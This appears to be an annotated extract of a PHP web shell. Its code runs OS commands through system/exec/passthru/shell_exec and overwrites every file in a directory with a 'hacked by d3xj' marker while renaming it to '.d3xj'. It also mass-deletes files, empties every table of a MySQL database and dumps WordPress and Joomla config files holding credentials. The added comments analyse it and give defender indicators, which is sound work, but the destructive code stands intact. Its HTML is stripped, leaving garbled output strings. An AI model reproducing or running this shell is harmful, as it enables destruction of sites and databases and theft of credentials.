".$perm.""; } else { return "
".$perm."
"; } }
// The fragment above closes a helper whose beginning lies outside this extract
// (presumably w(), which is called further down -- confirm against a full copy).
//
// r(): returns $perm embedded in one of two string templates, selected by
// is_readable($dir). The markup that told the two branches apart has been
// stripped from this copy, so both return values now look the same.
function r($dir,$perm) { if(!is_readable($dir)) { return "
".$perm."
"; } else { return "
".$perm."
"; } }
// exe(): OS command-execution primitive of this web shell.
// Probes system, exec, passthru and shell_exec in that order and uses the
// first one function_exists() reports; every call is prefixed with @ so
// failures stay silent. Output is captured (output buffering for
// system/passthru, the result array for exec, joined without separators) and
// returned as a string. If none of the four is reported, the function falls
// off the end and returns nothing.
// No caller of exe() appears in the visible part of the file.
// Defender note: hosts that never need these four functions can list them in
// php.ini disable_functions; a PHP worker spawning a shell is a useful
// process-monitoring signal.
function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } }
// perms(): renders fileperms($file) as an ls-style string. The first character
// is the file type taken from the high mode bits (s, l, -, b, d, c, p, or u
// when nothing matches); it is followed by the owner, group and other rwx
// triplets, with s/S and t/T standing in for setuid, setgid and sticky.
// Read-only helper used for the listing output.
function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }
// Request handling starts here. The working directory comes straight from the
// 'dir' query parameter and is passed to chdir() without validation, so every
// later relative-path operation (glob, fopen, unlink, rename) acts on a
// directory chosen by the requester. No authentication check is visible in
// this extract.
// Defender note: requests to an unexpected .php file that carry a 'dir' query
// parameter are worth searching for in web access logs.
if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); }
// Backslashes are normalised to '/', then the path is split to print a
// breadcrumb. Each path component is interpolated into the response as-is; no
// output escaping is visible.
$dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); echo "
You are here: "; foreach($scdir as $c_dir => $cdir) { echo "
$cdir
/"; } echo " [ ".w($dir, perms($dir))." ]
"; echo '
';
// POST field 'go': destructive overwrite-and-rename routine.
// error_reporting(0) hides failures and set_time_limit(0) removes the
// execution time limit, so the loop further down can run to completion on a
// large directory.
if (isset($_POST['go'])) { error_reporting(0); set_time_limit(0);
// The timed loop is empty, so the figure printed below says nothing about the
// work that follows; it is also divided by 60 while the label reads "secons".
$time_start = microtime(true); for($i=0; $i<1000; $i++){ } $time_end = microtime(true); $execution_time = ($time_end - $time_start)/60; echo '
total time execute in
'.$execution_time.'
secons
';
// Every name in the current directory matching '*.{*}' has its contents
// REPLACED by a fixed marker string via file_put_contents(). Nothing is
// encrypted and nothing of the original is kept, so affected files can only be
// restored from backups or snapshots.
// The name is then rewritten by swapping any of the listed extensions for
// ".d3xj" and the file is renamed.
// Indicators visible in this sample: the ".d3xj" suffix and the marker text
// assigned to $a_str.
// $time is printed but never assigned in the visible code.
$files = glob('*.{*}', GLOB_BRACE); foreach ($files as $filename) { $a_str = array("hacked by d3xj zuahahahaha"); $contents = implode(PHP_EOL, $a_str); $contents .= PHP_EOL . PHP_EOL; file_put_contents($filename, $contents); $newname = str_replace(array(".bmp", ".gif", ".jpg", ".png", ".php", ".html", ".txt", ".ico", ".sql", ".ini",".log",".css", ".rar", ".zip", ".xml", ".js", ".dist", ".json", ".scss", ".jpeg", ".crt", ".eot", ".svg", ".ttf", ".woff", ".swf", ".js.gz", ".gz", ".pot", ".htm", ".po", ".mo", ".otf"), ".d3xj", $filename); if(rename($filename, $newname)===true){ print '
⇢ '.$filename.'
infected 👍
'.$time.''; } else{ print '
⇢ '.$filename.'
failed 👎
'.$time.''; } } }
// (The fragment above finishes the preceding handler.)
// POST field 'sad': deletes every name in the current directory matching
// '*.{*}' with unlink() and prints one result line per file. Errors are
// silenced and the time limit is lifted inside the loop.
// File names are written to the response without visible escaping.
// Defender note: the only recovery path is backup or snapshot; file-integrity
// monitoring on the web root will show this as a burst of deletions by the
// web-server account.
if (isset($_POST['sad'])) { $files = glob('*.{*}', GLOB_BRACE); foreach ($files as $filename) { error_reporting(0); set_time_limit(0); if (unlink($filename)) { print '
⇢ '.$filename.'
deleted 👍
'; } else { print '
⇢ '.$filename.'
failed 👎
'; } } }
// (The fragment above finishes the preceding handler.)
// POST field 'drop': empties every table of a MySQL database.
// As in the 'go' handler, the timing below measures an empty loop and is
// cosmetic.
if (isset($_POST['drop'])) { error_reporting(0); set_time_limit(0); $time_start = microtime(true); for($i=0; $i<1000; $i++){ } $time_end = microtime(true); $execution_time = ($time_end - $time_start)/60; echo '
total time execute in
'.$execution_time.'
minute
';
// Host, user, password and database name all come from the POST body; the
// script then runs SHOW TABLES and issues an unconditional "DELETE FROM
// <table>" for each result. The return value of that mysql_query() call is not
// checked, so "success" is printed whether or not the delete worked.
// The mysql_* functions used here were removed in PHP 7.0, so this branch can
// only run on older PHP builds.
// Defender note: the credentials are supplied by the requester, which fits
// with the config-file dump handlers elsewhere in this file; restrict DB
// accounts to the privileges the application needs and alert on DELETE
// statements without a WHERE clause issued across many tables.
$host = $_POST['host']; $username = $_POST['username']; $password = $_POST['password']; $db = $_POST['db']; mysql_connect($host,$username,$password) or die("Failed login tolol"); mysql_select_db($db) or die("Database ga bisa dibuka tolol"); $res = mysql_query("SHOW TABLES"); $tables = array(); while($row = mysql_fetch_array($res, MYSQL_NUM)) { $tables[] = "$row[0]"; } $length = count($tables); for ($i = 0; $i < $length; $i++) { $res = "DELETE FROM $tables[$i]"; mysql_query($res); print '
⇢ '.$res.'
success 👍
'; } }
// (The fragment above finishes the preceding handler.)
// POST field 'wp': streams wp-config.php from the current directory to the
// response, line by line. In a WordPress install that file normally holds the
// database credentials and the authentication keys/salts.
// Defender note: if this shell was reachable, treat those secrets as exposed.
// Rotate the DB password and regenerate the keys/salts.
if (isset($_POST['wp'])) { error_reporting(0); set_time_limit(0); $file = fopen("wp-config.php", "r") or die("Can't open wp-config.php"); while(! feof($file)) { echo fgets($file). "
"; } fclose($file); } if (isset($_POST['jomla'])) { error_reporting(0); set_time_limit(0); $file = fopen("configuration.php", "r") or die("Can't open configuration.php"); while(! feof($file)) { echo fgets($file). "
"; } fclose($file); } echo '
';
// Directory listing, first pass: sub-directories only.
// $scandir is assigned only in the branch where $dir is a readable directory.
if(is_dir($dir) === true) { if(!is_readable($dir)) { echo "
can't open directory. ( not readable )
"; } else { echo '
Name
Type
Size
Last Modified
Owner/Group
Permission
';
// For each entry the loop collects type, mtime and owner/group (resolved to
// names through the posix_* functions when available, numeric ids otherwise),
// skips anything that is not a directory, and prints one row.
// Entry names and metadata are interpolated into the output without visible
// escaping.
// NOTE(review): this copy has lost its original line breaks, so the
// commented-out "//$downer = $uid;" now sits on the same physical line as live
// code; it was presumably a standalone line in the original file. The code
// line below is kept byte-for-byte.
$scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "
$dirx
"; } elseif($dirx === '.') { $href = "
$dirx
"; } else { $href = "
$dirx
"; } echo "
"; echo "
$href
"; echo "
$dtype
"; echo "
-
"; echo "
$dtime
"; echo "
$downer/$dgrp
"; echo "
".w("$dir/$dirx",perms("$dir/$dirx"))."
"; echo "
"; } } } else { echo "
can't open directory.
"; }
// Directory listing, second pass: regular files only.
// The loop reuses $scandir from the directory pass; that variable is set only
// when $dir was a readable directory, so on the error paths this loop runs
// over an undefined variable (warnings are not suppressed at this point unless
// an earlier handler called error_reporting(0)).
// For each entry it gathers type, mtime, size (KB, switched to MB above
// 1024 KB) and owner/group, skips non-files, and prints one row. Names and
// metadata are interpolated into the output without visible escaping.
// NOTE(review): as in the directory pass, the commented-out
// "//$downer = $uid;" has been joined onto the code line by the loss of line
// breaks in this copy; the line below is kept byte-for-byte.
foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$dir/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$dir/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$dir/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$dir/$file"); } if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo "
"; echo "
$file
"; echo "
$ftype
"; echo "
$size
"; echo "
$ftime
"; echo "
$fowner/$fgrp
"; echo "
".w("$dir/$file",perms("$dir/$file"))."
"; echo "
"; } echo "
"; if(!is_readable($dir)) { // } ?>